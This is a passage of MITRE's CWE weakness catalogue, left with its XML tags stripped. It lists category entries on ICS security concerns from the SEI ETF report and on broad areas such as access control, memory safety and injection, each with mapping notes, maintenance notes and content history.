2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Trust Model Problems" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Assumptions made about the user during the design or construction phase may result in vulnerabilities after the system is installed if the user operates it using a different security approach or process than what was designed or built." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Maker Breaker Blindness" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Lack of awareness of deliberate attack techniques by people (vs failure modes from natural causes like weather or metal fatigue) may lead to insufficient security controls being built into ICS systems." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Gaps in Details/Data" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Highly complex systems are often operated by personnel who have years of experience in managing that particular facility or plant. Much of their knowledge is passed along through verbal or hands-on training but may not be fully documented in written practices and procedures." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "Security Gaps in Commissioning" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "As a large system is brought online components of the system may remain vulnerable until the entire system is operating and functional and security controls are put in place. This creates a window of opportunity for an adversary during the commissioning process." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "Inherent Predictability in Design" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "The commonality of design (in ICS/SCADA architectures) for energy systems and environments opens up the possibility of scaled compromise by leveraging the inherent predictability in the design." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Gaps in obligations and training" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "OT ownership and responsibility for identifying and mitigating vulnerabilities are not clearly defined or communicated within an organization, leaving environments unpatched, exploitable, and with a broader attack surface." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Human factors in ICS environments" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Environmental factors in ICS including physical duress, system complexities, and isolation may result in security gaps or inadequacies in the performance of individual duties and responsibilities." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Post-analysis changes" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Changes made to a previously analyzed and approved ICS environment can introduce new security vulnerabilities (as opposed to safety)." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Exploitable Standard Operational Procedures" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Standard ICS Operational Procedures developed for safety and operational functionality in a closed, controlled communications environment can introduce vulnerabilities in a more connected environment." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This entry might be subject to CWE Scope Exclusions SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear) and/or SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Emerging Energy Technologies" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "With the rapid evolution of the energy system accelerated by the emergence of new technologies such as DERs, electric vehicles, advanced communications (5G+), novel and diverse challenges arise for secure and resilient operation of the system." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Compliance/Conformance with Regulatory Requirements" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "The ICS environment faces overlapping regulatory regimes and authorities with multiple focus areas (e.g., operational resiliency, physical safety, interoperability, and security) which can result in cyber security vulnerabilities when implemented as written due to gaps in considerations, outdatedness, or conflicting requirements." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This entry might be subject to CWE Scope Exclusions SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear) and/or SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Subgroup members did not find any CWEs to add to this category in CWE 4.11. There may be some gaps with respect to CWE's current scope, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Maintenance_Notes, Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to concerns of physical access. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Jason Fung (Intel), Paul A. Wortman (Wells Fargo) + Intel Corporation, Wells Fargo + 2022-05-13 + 4.8 + 2022-06-28 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. It is a leftover from PLOVER, but CWE-138 is a more appropriate mapping. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Functional_Areas, Name, Relationships, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + General Special Element Problems + + + + Weaknesses in this category are related to access control. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to comparison. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to component interaction. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to memory safety. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to concurrency. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to encryption. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to exposed resource. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to file handling. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to improper check or handling of exceptional conditions. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to improper input validation. + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to improper neutralization. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to incorrect calculation. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to injection. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to insufficient control flow management. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to insufficient verification of data authenticity. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to poor coding practices. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to protection mechanism failure. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to randomness. + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to resource control. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to resource lifecycle management. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to sensitive information exposure. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to violation of secure design principles. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1330]. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 